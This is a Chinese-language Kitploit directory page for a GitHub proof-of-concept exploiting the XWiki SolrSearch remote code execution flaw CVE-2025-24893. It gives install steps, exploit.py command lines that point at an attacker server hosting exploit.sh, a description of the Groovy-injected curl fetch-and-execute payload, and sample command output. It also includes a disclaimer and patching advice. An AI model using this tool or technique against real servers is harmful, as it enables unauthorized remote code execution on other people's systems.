Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
xwiki-cve-2025-24893-poc — CVE-2025-24893 的 PoC | Kitploit
工具/GitHubGitHub/570rmbr3ak3r/xwiki-cve-2025-24893-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用学习与教育远程访问工具
GitHub570rmbr3ak3r/xwiki-cve-2025-24893-poc

xwiki-cve-2025-24893-poc

CVE-2025-24893 的 PoC

查看仓库
3141年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

XWiki RCE 漏洞利用 PoC (CVE-2025-24893)

概述

本仓库包含针对 XWiki 远程代码执行 (RCE) 漏洞(编号 CVE-2025-24893)的概念验证 (PoC) 漏洞利用代码。该漏洞允许攻击者通过向 SolrSearch 端点发送精心构造的请求,在目标 XWiki 实例上执行任意代码。本脚本同时支持 HTTP 和 HTTPS 目标。

⚠️ 免责声明:本 PoC 仅供教育及研究用途。未经明确许可,将此代码用于任何系统均属违法且不道德。测试任何系统前,请务必获得适当授权。

漏洞详情

  • CVE 编号:CVE-2025-24893
  • 受影响组件:XWiki SolrSearch 端点
  • 影响:远程代码执行 (RCE)
  • 安全公告:GitHub 安全公告

该漏洞源于 SolrSearch 端点对用户输入的处理不当,允许通过精心构造的载荷注入 Groovy 代码。本 PoC 演示了攻击者如何利用此漏洞在目标服务器上执行任意命令。

前提条件

  • Python 3.x
  • 所需 Python 库:requests、argparse、urllib.parse、re、html
  • 一个易受 CVE-2025-24893 攻击的目标 XWiki 实例
  • 一个攻击者控制的服务器,用于托管 bash 脚本,需可通过 HTTP 或 HTTPS 访问
  • 一个包含待执行代码的文件,位于攻击者服务器上

安装

  1. 克隆此仓库:
    root@kitploit:~
    git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
    
  2. 安装所需的 Python 库:
    root@kitploit:~
    pip install requests
    

使用

该脚本向目标 XWiki 实例发送一个精心构造的 HTTP/HTTPS 请求,注入一个 Groovy 载荷,该载荷执行 curl 命令以获取并运行来自攻击者服务器的文件。

使用以下命令运行脚本:

root@kitploit:~
python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]

参数

  • --url:目标 XWiki 实例的基础 URL(例如 http://target 或 https://target)。
  • --server:攻击者服务器的 IP 或主机名(如有需要可包含端口),例如 192.168.1.100:8080。支持 HTTP 和 HTTPS。
  • --file:攻击者服务器上包含待执行代码的文件名称(例如 exploit.sh)。
  • --no-verify:可选标志,用于禁用 HTTPS 目标的 SSL 验证(请谨慎使用,仅用于测试)。

示例

root@kitploit:~
python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh

要绕过 SSL 验证(例如使用自签名证书时):

root@kitploit:~
python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify

此操作将:

  1. 构造一个利用 Groovy 脚本执行 curl 命令的载荷。
  2. 从攻击者服务器 (http(s)://192.168.1.100:8080) 获取指定的文件 (exploit.sh)。
  3. 在目标系统上执行获取到的文件。
  4. 提取并显示输出,同时清理所有 HTML 标签和实体。

输出

脚本从目标响应中提取内容,移除 HTML 标签(例如 <br/>、<del>),并将 HTML 实体转换为纯文本以提高可读性。清理后的输出将打印到控制台。

示例

root@kitploit:~
python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)

限制

  • 目标 XWiki 实例必须存在 CVE-2025-24893 漏洞。
  • 攻击者服务器必须能被目标系统通过 HTTP 或 HTTPS 访问。
  • 脚本假定目标服务器支持 SolrSearch 端点并允许执行 Groovy 脚本。

缓解措施

为防范此漏洞:

  • 将 XWiki 更新至最新的已修补版本。
  • 请参阅 GitHub 安全公告 了解详细的缓解步骤。
  • 博客参考:CVE-2025-24893

许可证

本项目采用 MIT 许可证授权。详情请参见 LICENSE 文件。

下载工具